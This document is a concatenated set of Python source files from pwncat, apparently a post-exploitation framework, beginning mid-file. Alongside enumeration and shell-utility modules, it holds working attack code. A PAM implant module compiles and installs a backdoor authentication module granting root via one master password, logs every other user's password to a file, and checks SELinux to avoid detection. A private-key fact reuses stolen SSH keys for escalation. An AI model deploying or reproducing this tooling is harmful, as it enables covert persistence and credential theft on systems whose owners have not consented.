            yield CVE_2017_5618(self.name, screen)



#!/usr/bin/env python3
import fnmatch
from io import IOBase

import pwncat.modules
from pwncat.modules import Status, ModuleFailed
from pwncat.modules.enumerate import EnumerateModule


def iterate_two_lists(a, b):
    yield from a
    yield from b


def list_wrapper(iterable):
    """Wraps a list in a generator"""
    yield from iterable


def FileType(mode: str = "r"):
    def _file_type(path: str):

        if path is None:
            return None

        if isinstance(path, IOBase):
            return path

        try:
            return open(path, mode)
        except (FileNotFoundError, PermissionError):
            raise ValueError(f"{path}: unable to open with mode: {mode}")

    return _file_type


class Module(pwncat.modules.BaseModule):
    """
    Perform multiple enumeration modules and write a formatted
    report to the filesystem.
    """

    ARGUMENTS = {
        "output": pwncat.modules.Argument(
            FileType("w"),
            default=None,
            help="The file to write a markdown report to (default: stdout)",
        ),
        "modules": pwncat.modules.Argument(
            pwncat.modules.List(str),
            default=["*"],
            help="List of modules to run (default: all)",
        ),
        "types": pwncat.modules.Argument(
            pwncat.modules.List(str),
            default=[],
            help="List of enumeration types to collect (default: all)",
        ),
        "clear": pwncat.modules.Argument(
            bool, default=False, help="Clear the cached results of all matching modules"
        ),
        "cache": pwncat.modules.Argument(
            bool,
            default=True,
            help="Return cached results along with new facts (default: True)",
        ),
        "exclude": pwncat.modules.Argument(
            pwncat.modules.List(str),
            default=None,
            help="glob pattern of module names to exclude",
        ),
    }
    PLATFORM = None

    def run(self, session, output, modules, types, clear, cache, exclude):
        """Perform a enumeration of the given modules and save the output"""

        module_names = modules

        # Find all the matching modules (use set to ensure uniqueness)
        modules = set()
        for name in module_names:
            modules = modules | set(
                list(session.find_module(f"enumerate.{name}", base=EnumerateModule))
            )

        if exclude is not None and exclude:
            modules = (
                module
                for module in modules
                if not any(fnmatch.fnmatch(module.name, e) for e in exclude)
            )

        if clear:
            for module in modules:
                yield pwncat.modules.Status(module.name)
                module.run(session, clear=True)
            return

        # Enumerate all facts
        facts = {}

        if cache:
            for fact in iterate_two_lists(session.target.facts, session.facts):
                if not types or any(
                    any(fnmatch.fnmatch(t2, t1) for t2 in fact.types) for t1 in types
                ):
                    if fact.type not in facts:
                        facts[fact.type] = [fact]
                    else:
                        facts[fact.type].append(fact)

                    if output is None:
                        yield fact
                    else:
                        yield Status(fact.title(session))

        for module in modules:

            if types:
                for pattern in types:
                    for typ in module.PROVIDES:
                        if fnmatch.fnmatch(typ, pattern):
                            # This pattern matched
                            break
                    else:
                        # This pattern didn't match any of the provided
                        # types
                        continue
                    # We matched at least one type for this module
                    break
                else:
                    # We didn't match any types for this module
                    continue

            # update our status with the name of the module we are evaluating
            yield pwncat.modules.Status(module.name)

            # Iterate over facts from the sub-module with our progress manager
            try:
                for item in module.run(session, types=types):
                    if item.type not in facts:
                        facts[item.type] = [item]
                        if output is None:
                            yield item
                        else:
                            yield Status(item.title(session))
                    else:
                        for fact in facts[item.type]:
                            if fact == item:
                                break
                        else:
                            facts[item.type].append(item)
                            if output is None:
                                yield item
                            else:
                                yield Status(item.title(session))
            except ModuleFailed as exc:
                session.log(f"[red]{module.name}[/red]: {str(exc)}")



#!/usr/bin/env python3
from typing import List

import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: Eventually, this should be used for escalation as well, because privilege
escalation can be performed with binary capabilities. These are not yet
implemented in our gtfobins.json database, but John can tackle that soon.
"""


class FileCapabilityData(Fact):
    def __init__(self, source, path, caps):
        super().__init__(source=source, types=["file.caps"])

        self.path: str = path
        """ The path to the file """
        self.caps: List[str] = caps
        """ List of strings representing the capabilities (e.g. "cap_net_raw+ep") """

    def title(self, session):
        line = f"[cyan]{rich.markup.escape(self.path)}[/cyan] -> ["
        line += ",".join(f"[blue]{rich.markup.escape(c)}[/blue]" for c in self.caps)
        line += "]"
        return line


class Module(EnumerateModule):
    """Enumerate capabilities of the binaries of the remote host"""

    PROVIDES = ["file.caps"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        # Spawn a find command to locate the setuid binaries
        proc = session.platform.Popen(
            ["getcap", "-r", "/"],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                # Parse out path and capability list

                # getcap is inconsistent in how it displays output.
                # We can try and handle both cases.
                if " = " in line:
                    # /usr/bin/mtr-packet = cap_net_raw+ep
                    path, caps = [x.strip() for x in line.strip().split("=")]
                    caps = caps.split(",")
                    fact = FileCapabilityData(self.name, path, caps)
                else:
                    path, caps = [x.strip() for x in line.strip().split(" ")]
                    caps = caps.split(",")
                    fact = FileCapabilityData(self.name, path, caps)

                yield fact

        proc.wait()



#!/usr/bin/env python3

from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Alias an existing command with a new name. Specifying no alias or command
    will list all aliases. Specifying an alias with no command will remove the
    alias if it exists.
    """

    def get_command_names(self):
        return [c.PROG for c in self.manager.parser.commands]

    PROG = "alias"
    ARGS = {
        "alias": Parameter(Complete.NONE, help="name for the new alias", nargs="?"),
        "command": Parameter(
            Complete.CHOICES,
            metavar="COMMAND",
            choices=get_command_names,
            help="the command the new alias will use",
            nargs="?",
        ),
    }
    LOCAL = True

    def run(self, manager, args):
        if args.alias is None:
            for name, command in manager.parser.aliases.items():
                console.print(
                    f" [cyan]{name}[/cyan] \u2192 [yellow]{command.PROG}[/yellow]"
                )
        elif args.command is not None:
            # This is safe because of "choices" in the argparser
            manager.parser.aliases[args.alias] = [
                c for c in manager.parser.commands if c.PROG == args.command
            ][0]
        else:
            del manager.parser.aliases[args.alias]



#!/usr/bin/env python3
import io
import hashlib
from subprocess import CalledProcessError

import pkg_resources

import pwncat
from pwncat.facts import Implant, CreatedFile
from pwncat.modules import Status, Argument, ModuleFailed
from pwncat.platform import PlatformError
from pwncat.platform.linux import Linux
from pwncat.modules.implant import ImplantModule


class PamImplant(Implant):
    def __init__(self, source, password, log, module_path, configs, line):
        super().__init__(source=source, uid=0, types=["implant.replace"])

        self.line = line
        self.module_path = module_path
        self.configs = configs
        self.password = password
        self.log = log

    def escalate(self, session: "pwncat.manager.Session"):
        """Escalate to root with the pam implant"""

        try:
            session.platform.su("root", password=self.password)
        except (PermissionError, PlatformError) as exc:
            raise ModuleFailed(str(exc)) from exc

    def remove(self, session: "pwncat.manager.Session"):
        """Remove the installed implant"""

        if session.current_user().id != 0:
            raise ModuleFailed("root permissions required to remove pam module")

        config_path = session.platform.Path("/etc/pam.d")

        # Remove the configuration files
        for config in self.configs:
            try:
                with (config_path / config).open("r") as filp:
                    contents = filp.readlines()
                with (config_path / config).open("w") as filp:
                    filp.writelines(line for line in contents if line != self.line)
            except (PermissionError, FileNotFoundError):
                continue

        # Remove the module
        try:
            session.platform.unlink(self.module_path)
        except FileNotFoundError:
            pass

        # Track the log file separately now
        session.register_fact(CreatedFile(self.source, 0, self.log))

    def title(self, session: "pwncat.manager.Session"):
        return f"""pam backdoor implant (logging to [cyan]{self.log}[/cyan])"""


class Module(ImplantModule):
    """
    Install a backdoor PAM module which allows authentication
    with a single password for all users. This PAM module does
    not interrupt authentication with correct user passwords.
    Further, it will log all entered passwords (except the
    backdoor password) to a log file which can be collected
    with the creds.pam enumeration module. The installed module
    will be named `pam_succeed.so`.
    """

    PLATFORM = [Linux]
    ARGUMENTS = {
        **ImplantModule.ARGUMENTS,
        "password": Argument(str, help="The password to use for the backdoor"),
        "log": Argument(
            str,
            default="/var/log/firstlog",
            help="Remote path to store logged user/password combinations",
        ),
    }

    def install(self, session: "pwncat.manager.Session", password, log):
        """install the pam module"""

        if session.current_user().id != 0:
            raise ModuleFailed("root permissions required to install pam module")

        if any(
            i.source == self.name
            for i in session.run("enumerate", types=["implant.replace"])
        ):
            raise ModuleFailed("only one pam implant may be installed at a time")

        yield Status("loading pam module source code")
        with open(pkg_resources.resource_filename("pwncat", "data/pam.c"), "r") as filp:
            sneaky_source = filp.read()

        yield Status("checking selinux state")
        for selinux in session.run("enumerate", types=["system.selinux"]):
            if selinux.enabled and "enforc" in selinux.mode:
                raise ModuleFailed("selinux enabled in enforce mode")
            elif selinux.enabled:
                session.log(
                    "[yellow]warning[/yellow]: selinux is enabled; implant will be logged!"
                )

        # Hash the backdoor password and prepare for source injection
        password_hash = ",".join(
            hex(c) for c in hashlib.sha1(password.encode("utf-8")).digest()
        )

        yield Status("patching module source code")

        # Inject password hash into source code
        sneaky_source = sneaky_source.replace("__PWNCAT_HASH__", password_hash)

        # Inject log path
        sneaky_source = sneaky_source.replace("__PWNCAT_LOG__", log)

        try:
            yield Status("compiling pam module")
            lib_path = session.platform.compile(
                [io.StringIO(sneaky_source)],
                suffix=".so",
                cflags=["-shared", "-fPIE"],
                ldflags=["-lcrypto"],
            )
        except (PlatformError, NotImplementedError) as exc:
            raise ModuleFailed(str(exc)) from exc

        try:
            yield Status("locating pam modules... ")
            result = session.platform.run(
                "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'",
                shell=True,
                capture_output=True,
                text=True,
                check=True,
            )
            pam_location = session.platform.Path(
                result.stdout.strip().split("\n")[0]
            ).parent
        except CalledProcessError as exc:
            try:
                session.platform.run(["rm", "-f", lib_path], check=True)
            except CalledProcessError:
                session.register_fact(
                    CreatedFile(source=self.name, uid=0, path=lib_path)
                )
            raise ModuleFailed("failed to locate pam installation location") from exc

        yield Status("copying pam module")
        session.platform.run(["mv", lib_path, str(pam_location / "pam_succeed.so")])

        added_line = "auth\tsufficient\tpam_succeed.so\n"
        modified_configs = []
        config_path = session.platform.Path("/", "etc", "pam.d")

        yield Status("patching pam configuration: ")
        for config in ["common-auth"]:
            yield Status(f"patching pam configuration: {config}")

            try:
                with (config_path / config).open("r") as filp:
                    content = filp.readlines()
            except (PermissionError, FileNotFoundError):
                continue

            any("pam_rootok" in line for line in content)
            for i, line in enumerate(content):
                if "pam_rootok" in line:
                    content.insert(i + 1, added_line)
                    break
                elif line.startswith("auth"):
                    content.insert(i, added_line)
                    break
            else:
                content.append(added_line)

            try:
                with (config_path / config).open("w") as filp:
                    filp.writelines(content)
                modified_configs.append(config)
            except (PermissionError, FileNotFoundError):
                continue

        if not modified_configs:
            (pam_location / "pam_succeed.so").unlink()
            raise ModuleFailed("failed to add module to configuration")

        return PamImplant(
            self.name,
            password,
            log,
            str(pam_location / "pam_succeed.so"),
            modified_configs,
            added_line,
        )



#!/usr/bin/env python3


from pwncat.util import console
from pwncat.config import KeyType
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Create key aliases for when in raw mode. This only works from platforms
    which provide a raw interaction (such as linux).
    """

    PROG = "bind"
    ARGS = {
        "key": Parameter(
            Complete.NONE,
            metavar="KEY",
            type=KeyType,
            help="The key to map after your prefix",
            nargs="?",
        ),
        "script": Parameter(
            Complete.NONE,
            help="The script to run when the key is pressed",
            nargs="?",
        ),
    }
    LOCAL = True

    def run(self, manager, args):
        if args.key is None:
            for key, binding in manager.config.bindings.items():
                console.print(f" [cyan]{key}[/cyan] = [yellow]{repr(binding)}[/yellow]")
        elif args.key is not None and args.script is None:
            if args.key in manager.config.bindings:
                del manager.config.bindings[args.key]
        else:
            manager.config.bindings[args.key] = args.script



"""
Generic facts used for standard enumerations. Some fact types are
used for multiple platforms, so they were separated out here. You
should not generally need to use these types except as reference
when interacting with data returned by an enumeration module.
"""
import time
import subprocess
from io import StringIO
from typing import Callable, Optional

import rich.markup
from persistent.list import PersistentList

import pwncat
from pwncat.db import Fact
from pwncat.channel import ChannelError
from pwncat.modules import ModuleFailed
from pwncat.platform import PlatformError
from pwncat.facts.tamper import (  # noqa: F401
    Tamper,
    CreatedFile,
    ReplacedFile,
    CreatedDirectory,
)
from pwncat.facts.ability import (  # noqa: F401
    GTFOExecute,
    GTFOFileRead,
    SpawnAbility,
    GTFOFileWrite,
    ExecuteAbility,
    FileReadAbility,
    FileWriteAbility,
    build_gtfo_ability,
)
from pwncat.facts.implant import Implant, ImplantType, KeepImplantFact  # noqa: F401


class ArchData(Fact):
    """
    Simply the architecture of the remote machine. This class
    wraps the architecture name in a nicely printable data
    class.

    :param source: module which generated this fact
    :type source: str
    :param arch: the name of the architecture
    :type arch: str
    """

    def __init__(self, source, arch):
        super().__init__(source=source, types=["system.arch"])

        self.arch: str = arch
        """ The determined architecture. """

    def title(self, session):
        return f"Running on a [cyan]{self.arch}[/cyan] processor"


class HostnameData(Fact):
    """
    The hostname of this target as retrieved from the target itself.
    This is not guaranteed to be resolvable, and is simply the name
    which the  target uses for itself (e.g. from the ``hostname``
    command).

    :param source: module which generated this fact
    :type source: str
    :param hostname: the hostname of the target
    :type hostname: str
    """

    def __init__(self, source, hostname):
        super().__init__(source=source, types=["system.hostname"])

        self.hostname: str = hostname
        """ The determined architecture. """

    def title(self, session):
        return f"[cyan]{self.hostname}[/cyan]"


class DistroVersionData(Fact):
    """OS Distribution and version information

    :param source: module which generated this fact
    :type source: str
    :param name: the name of the target operating system
    :type name: str
    :param ident: identifier for this specific distro
    :type ident: str
    :param build_id: the build identifier for this OS
    :type build_id: str
    :param version: the version of the installed OS
    :type version: str
    """

    def __init__(self, source, name, ident, build_id, version):
        super().__init__(source=source, types=["system.distro"])

        self.name: str = name
        self.ident: str = ident
        self.build_id: str = build_id
        self.version: str = version

    def title(self, session):
        return (
            f"[blue]{rich.markup.escape(str(self.name))}[/blue] ([cyan]{rich.markup.escape(self.ident)}[/cyan]), "
            f"Version [red]{rich.markup.escape(str(self.version))}[/red], "
            f"Build ID [green]{rich.markup.escape(str(self.build_id))}[/green]."
        )


class Group(Fact):
    """Basic representation of a user group on the target system. Individual
    platform enumeration modules may subclass this to implement other user
    properties as needed for their platform.

    :param source: module which generated this fact
    :type source: str
    :param name: the name of the group
    :type name: str
    :param id: the unique group identifier
    :type id: Union[int, str]
    :param members: a list of unique UIDs who are members of this group
    :type members: List[Union[int,str]]
    """

    def __init__(self, source: str, name: str, gid, members):
        super().__init__(["group"], source)

        self.name: str = name
        self.id = gid
        self.members: PersistentList = PersistentList(members)

    def title(self, session: "pwncat.manager.Session"):

        members = []
        for uid in self.members:
            user = session.find_user(uid=uid)

            if user is None and not isinstance(uid, int):
                user = session.find_group(gid=uid)

            if user is None:
                members.append(f"UID({repr(uid)})")
            else:
                members.append(user.name)

        return f"""Group(gid={repr(self.id)}, name={repr(self.name)}, members={repr(members)})"""


class User(Fact):
    """Basic representation of a user on the target system. Individual platform
    enumeration modules may subclass this to implement other user properties as
    needed for their platform.

    :param source: module which generated this fact
    :type source: str
    :param name: name of the user
    :type name: str
    :param uid: unique identifier for this user
    :type uid: Union[int, str]
    :param password: the password if known
    :type password: Optional[str]
    :param hash: the password hash if known
    :type hash: Optional[str]
    """

    def __init__(
        self,
        source: str,
        name,
        uid,
        password: Optional[str] = None,
        hash: Optional[str] = None,
    ):
        super().__init__(["user"], source)

        self.name: str = name
        self.id = uid
        self.password: Optional[str] = None
        self.hash: Optional[str] = None

    def __repr__(self):
        if self.password is None and self.hash is None:
            return f"""User(uid={self.id}, name={repr(self.name)})"""
        elif self.password is not None:
            return f"""User(uid={repr(self.id)}, name={repr(self.name)}, password={repr(self.password)})"""
        else:
            return f"""User(uid={repr(self.id)}, name={repr(self.name)}, hash={repr(self.hash)})"""


class PotentialPassword(Fact):
    """A password possible extracted from a remote file
    `filepath` and `lineno` may be None signifying this
    password did not come from a file directly.

    :param source: module which generated this fact
    :type source: str
    :param password: the suspected password
    :type password: str
    :param filepath: the file where we found the password
    :type filepath: str
    :param lineno: the line number where the password was found
    :type lineno: int
    :param uid: the user ID for which this password is suspected
    :type uid: Union[int, str]
    """

    def __init__(self, source, password, filepath, lineno, uid):
        super().__init__(source=source, types=["creds.password"])

        self.password: str = password
        self.filepath: str = filepath
        self.lineno: int = lineno
        self.uid: int = uid

    def title(self, session):
        if self.password is not None:
            result = f"Potential Password [cyan]{rich.markup.escape(repr(self.password))}[/cyan]"
            if self.uid is not None:
                result += f" for [blue]{rich.markup.escape(session.find_user(uid = self.uid).name)}[/blue]"
            if self.filepath is not None:
                result += f" ({rich.markup.escape(self.filepath)}:{self.lineno})"
        else:
            result = f"Potential Password at [cyan]{rich.markup.escape(self.filepath)}[/cyan]:{self.lineno}"

        return result


class PrivateKey(Implant):
    """A private key found on the remote file system or known
    to be applicable to this system in some way. This fact can
    also act as an implant. By default, removing the implant will
    only remove the implant types from the fact. It is assumed that
    the key was enumerated and not installed. If connection or escalation
    fails, the `authorized` property is set to False and the implant
    types are automatically removed.

    :param source: module which generated this fact
    :type source: str
    :param path: path to the private key on the target
    :type path: str
    :param uid: the user for which the key was found
    :type uid: Union[int, str]
    :param content: content of the private key
    :type content: str
    :param encrypted: whether the key is encrypted
    :type encrypted: bool
    :param authorized: whether this key is authorized for the user
    :type authorized: bool
    """

    def __init__(self, source, path, uid, content, encrypted, authorized: bool = True):
        super().__init__(
            source=source,
            uid=uid,
            types=["creds.private_key", "implant.replace", "implant.remote"],
        )

        self.uid: int = uid
        """ The uid we believe the private key belongs to """
        self.path: str = path
        """ The path to the private key on the remote host """
        self.content: str = content
        """ The actual content of the private key """
        self.encrypted: bool = encrypted
        """ Is this private key encrypted? """
        self.authorized: bool = authorized

    def title(self, session: "pwncat.manager.Session"):
        user = session.find_user(uid=self.uid)

        return f"Private key owned by [blue]{user.name}[/blue] at [cyan]{rich.markup.escape(self.path)}[/cyan]"

    def description(self, session) -> str:
        return self.content

    def remove(self, session: "pwncat.manager.Session"):
        """Remove the implant types from this private key"""

        raise KeepImplantFact()

    def escalate(self, session: "pwncat.manager.Session"):
        """Escalate to the owner of this private key with a local ssh call"""

        if not self.authorized:
            raise ModuleFailed("key is not authorized or failed")

        if session.platform.which("ssh") is None:
            raise ModuleFailed("no local ssh binary")

        current_user = session.current_user()
        user = session.find_user(uid=self.uid)

        # Upload the private key
        with session.platform.tempfile(suffix="", mode="w") as dest:
            privkey_path = dest.name
            dest.write(self.content)

        # Set permissions on private key
        session.platform.chown(privkey_path, current_user.id, current_user.gid)
        session.platform.chmod(privkey_path, 0o600)

        # Execute SSH
        proc = session.platform.Popen(
            [
                "ssh",
                "-i",
                privkey_path,
                "-o",
                "StrictHostKeyChecking=no",
                "-o",
                "PasswordAuthentication=no",
                "-o",
                "ChallengeResponseAuthentication=no",
                f"{user.name}@localhost",
            ],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            stdin=subprocess.PIPE,
        )

        # Wait a second to see if there's an error from ssh
        time.sleep(1)
        if proc.poll() is not None:
            self.authorized = False
            self.types.remove("implant.replace")
            self.types.remove("implant.remote")
            session.db.transaction_manager.commit()
            raise ModuleFailed(
                f"ssh to localhost failed w/ exit code {proc.returncode}"
            )

        # Detach the popen object
        proc.detach()

        return lambda session: session.platform.channel.send(b"exit\n")

    def trigger(
        self, manager: "pwncat.manager.Manager", target: "pwncat.target.Target"
    ):
        """Connect remotely to this target with the specified user and key"""

        if not self.authorized:
            raise ModuleFailed("key is not authorized or failed")

        # Find the user for this UID
        for fact in target.facts:
            if "user" in fact.types and fact.id == self.uid:
                user = fact
                break
        else:
            raise ModuleFailed(f"unknown username for uid={self.uid}")

        try:
            # Connect via SSH
            session = manager.create_session(
                "linux",
                host=target.public_address[0],
                user=user.name,
                identity=StringIO(self.content + "\n"),
            )
        except (ChannelError, PlatformError) as exc:
            manager.log(
                f"[yellow]warning[/yellow]: {self.source} implant failed; removing implant types."
            )
            self.authorized = False
            self.types.remove("implant.remote")
            self.types.remove("implant.replace")
            raise ModuleFailed(str(exc)) from exc

        return session


class EscalationReplace(Fact):
    """Performs escalation and transforms the current session into the context
    of the specified user. This is a base class for escalations.

    :param source: the name of the generating module
    :type source: str
    :param source_uid: the starting uid needed to use this escalation
    :param uid: the target uid for this escalation
    """

    def __init__(self, source, source_uid, uid):
        super().__init__(types=["escalate.replace"], source=source)

        self.source_uid = source_uid
        self.uid = uid

    def escalate(
        self, session: "pwncat.manager.Session"
    ) -> Callable[["pwncat.manager.Session"], None]:
        """Execute the escalation optionally returning a new session

        :param session: the session on which to operate
        :type session: pwncat.manager.Session
        :returns: Callable - A lambda taking the session and exiting the new shell
        """


class EscalationSpawn(Fact):
    """Performs escalation and spawns a new session in the context of the
    specified user. The execute method will return the new session. This
    is a base class for escalations.

    :param source: the name of the generating module
    :type source: str
    :param source_uid: the starting uid needed to use this escalation
    :param uid: the target uid for this escalation
    """

    def __init__(self, source, source_uid, uid):
        super().__init__(types=["escalate.spawn"], source=source)

        self.source_uid = source_uid
        self.uid = uid

    def execute(self, session: "pwncat.manager.Session") -> "pwncat.manager.Session":
        """Spawn a new session under the context of a new user

        :param session: the session on which to operate
        :type session: pwncat.manager.Session
        :returns: pwncat.manager.Session - a newly established session as the specified user
        """



"""
pwncat supports abstract local and remote implants. Implants provide a way for
pwncat to either remotely reconnect or locally escalate privileges. Escalation
modules should be placed organizationally under the `implant/` package.

An implant module implements a single method named ``install`` and can take
any arbitrary arguments. The install method must return an :class:`Implant`
subclass. This class is what tracks implant installation, and allows for
triggering and removing the implant.

After installation, the :class:`Implant` object is added to the database
and can be located using the ``enumerate`` module and searching for
``implant.*`` fact types.

For examples of implant modules, see the ``pam`` and ``passwd`` built-in
implants located in ``pwncat/modules/linux/implant/``.
"""

import pwncat
from pwncat.modules import Status, BaseModule


class ImplantModule(BaseModule):
    """
    Base class for all implant modules.

    Implants must implement the :func:``install`` method and cannot
    override the :func:`run` method. The install method takes the same
    arguments as the standard :func:`run` method, including all your
    custom arguments.

    The install method must be a generator which yields :class:`Status`
    instances, and returns a :class:`Implant` object. Implant objects
    track the installed implant, and also provide methods for triggering,
    escalation and removal. Check the documentation for the :class:`Implant`
    class for more details.
    """

    """ Defines where this implant module is useful (either remote
    connection or local escalation or both). This also identifies a
    given implant module as applying to "all users" """
    ARGUMENTS = {}
    """ The default arguments for any persistence module. If other
    arguments are specified in sub-classes, these must also be
    included to ensure compatibility across persistence modules. """
    COLLAPSE_RESULT = True
    """ The ``run`` method returns a single scalar value even though
    it utilizes a generator to provide status updates. """

    def run(self, session: "pwncat.manager.Session", **kwargs):
        """This method should not be overriden by subclasses. It handles all logic
        for installation, escalation, connection, and removal. The standard interface
        of this method allows abstract interactions across all persistence modules."""

        yield Status("installing implant")
        implant = yield from self.install(session, **kwargs)

        # Register the installed implant as an enumerable fact
        session.register_fact(implant)

        # Update the database
        session.db.transaction_manager.commit()

        # Return the implant
        return implant

    def install(self, **kwargs):
        """
        Install the implant on the target host and return a new implant instance.
        The implant will be automatically added to the database. Arguments aside
        from `remove` and `escalate` are passed directly to the install method.

        :param session: the session on which to operate
        :type session: pwncat.manager.Session
        :param kwargs: Any custom arguments defined in your ``ARGUMENTS`` dictionary.
        :raises ModuleFailed: installation failed.
        """
        raise NotImplementedError



#!/usr/bin/env python3

from typing import Optional

import rich.markup

from pwncat.db import Fact
from pwncat.modules import Status, ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Scope, Schedule, EnumerateModule


class ProcessData(Fact):
    """Remote process information"""

    def __init__(
        self,
        source: str,
        name: str,
        pid: int,
        session: Optional[int],
        owner: str,
        state: int,
        path: str,
        commandline: str,
        handle: int,
    ):
        super().__init__(source=source, types=["system.processes"])

        self.name: str = name
        self.pid: int = pid
        self.session: int = session
        self.owner: str = owner
        self.state: int = state
        self.path: str = path
        self.commandline: str = commandline
        self.handle: int = handle

        if self.path == "":
            self.path = None
        if self.owner == "":
            self.owner = None

    def kill(self, session):
        """Attempt to kill the process"""

        try:
            session.platform.powershell(f"(Get-Process -Id {self.pid}).Kill()")
        except PowershellError as exc:
            raise ModuleFailed(f"failed to kill process {self.pid}") from exc

    def wait(self, session, timeout: int = -1):
        """
        Wait for the process to exit.

        :param timeout: The amount of time , in milliseconds, to wait for the associated process to exit.
            0 specifies an immediate exit. -1 specifies an infinite wait.
        :type timeout: int
        :raises:
            TimeoutError: the process did not exit within the timeout specified
            PermissionError: you do not have permission to wait for the specified process or the process does not exist
        """

        try:
            result = session.platform.powershell(
                f"(Get-Process -Id {self.pid}).WaitForExit({timeout})"
            )
            if not result or not result[0]:
                raise TimeoutError(self)
        except PowershellError:
            raise PermissionError(f"cannot wait for process w/ pid {self.pid}")

    def title(self, session):
        """Build a formatted description for this process"""

        out = "[cyan]{name}[/cyan] (PID [blue]{pid}[/blue]) is {state} "

        state = "[green]running[/green]"
        if self.state == 7:
            state = "[red]terminated[/red]"
        elif self.state == 8:
            state = "[yellow]stopped[/red]"

        if self.owner is None:
            color = "yellow"
            owner = "unknown"
        else:
            color = "magenta"

            owner = session.find_user(uid=self.owner)
            if owner is None:
                owner = session.find_group(gid=self.owner)
            if owner is None:
                owner = f"SID({repr(self.owner)})"
            else:
                owner = owner.name

        out += "owned by [{color}]{owner}[/{color}]"

        return out.format(
            name=rich.markup.escape(self.name),
            pid=self.pid,
            owner=owner,
            color=color,
            state=state,
        )


class Module(EnumerateModule):
    """Retrieve a list of current processes running on the target"""

    PROVIDES = ["system.processes"]
    PLATFORM = [Windows]
    # We don't save process results. They're volatile. Maybe this should be `Schedule.ALWAYS` anyway though? :shrug:
    SCHEDULE = Schedule.ALWAYS
    SCOPE = Scope.NONE

    def enumerate(self, session):

        script = """
Get-WmiObject -Class Win32_Process | % {
    [PSCustomObject]@{
        commandline=$_.CommandLine;
        description=$_.Description;
        path=$_.ExecutablePath;
        state=$_.ExecutionState;
        handle=$_.Handle;
        name=$_.Name;
        id=$_.ProcessId;
        session=$_.SessionId;
        owner=$_.GetOwnerSid().Sid;
    }
}
        """

        try:
            yield Status("requesting process list...")
            processes = session.platform.powershell(script)[0]
        except (IndexError, PowershellError) as exc:
            raise ModuleFailed(f"failed to get running processes: {exc}")

        for proc in processes:
            yield ProcessData(
                source=self.name,
                name=proc["name"],
                pid=proc["id"],
                session=proc.get("session"),
                owner=proc["owner"],
                state=proc["state"],
                commandline=proc["commandline"],
                path=proc["path"],
                handle=proc["handle"],
            )



#!/usr/bin/env python3
import os
import pathlib

import pwncat
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """Change the local current working directory"""

    PROG = "lcd"
    ARGS = {
        "path": Parameter(Complete.LOCAL_FILE),
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        # Expand `~`
        path = pathlib.Path(args.path).expanduser()

        # Ensure the directory exists
        if not path.is_dir():
            self.parser.error(f"{path}: not a directory")

        # Change to that directory
        os.chdir(str(path))



#!/usr/bin/env python3

import pwncat
from pwncat.util import random_string
from pwncat.facts import ArchData, HostnameData, DistroVersionData
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Enumerate windows system information"""

    PROVIDES = ["system.distro", "system.arch", "system.hostname"]
    PLATFORM = [Windows]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):

        query_system_info = """
        function query_sysinfo {
          $os_info = (Get-CimInstance Win32_operatingsystem)
          $hostname = [System.Net.Dns]::GetHostName()

          [PsCustomObject]@{
            HostName = $hostname;
            BuildNumber = $os_info.BuildNumber;
            BuildType = $os_info.BuildType;
            CountryCode = $os_info.CountryCode;
            TimeZone = $os_info.CurrentTimeZone;
            DEP = [PsCustomObject]@{
              Available = $os_info.DataExecutionPrevention_Available;
              Available32 = $os_info.DataExecutionPrevention_32bitApplications;
              Drivers = $os_info.DataExecutionPrevention_Drivers;
              SupportPolicy = $os_info.DataExecutionPrevention_SupportPolicy;
            };
            Debug = $os_info.Debug;
            Description = $os_info.Description;
            InstallDate = $os_info.InstallDate;
            LastBootUpTime = $os_info.LastBootUpTime;
            Name = $os_info.Name;
            Architecture = $os_info.OSArchitecture;
            Language = $os_info.OSLanguage;
            Suite = $os_info.OSProductSuite;
            Type = $os_info.OSType;
            ServicePackMajor = $os_info.ServicePackMajorVersion;
            ServicePackMinor = $os_info.ServicePackMinorVersion;
            Version = $os_info.Version;
          }
        }
        query_sysinfo
        """.replace(
            "query_sysinfo", random_string(8)
        )

        try:
            info = session.platform.powershell(query_system_info)[0]
        except PowershellError as exc:
            raise ModuleFailed(f"failed to load sysinfo function: {exc}")

        yield DistroVersionData(
            self.name,
            info["Name"].split("|")[0],
            info["BuildType"],
            info["BuildNumber"],
            info["Version"],
        )

        yield HostnameData(self.name, info["HostName"])

        yield ArchData(self.name, info["Architecture"])
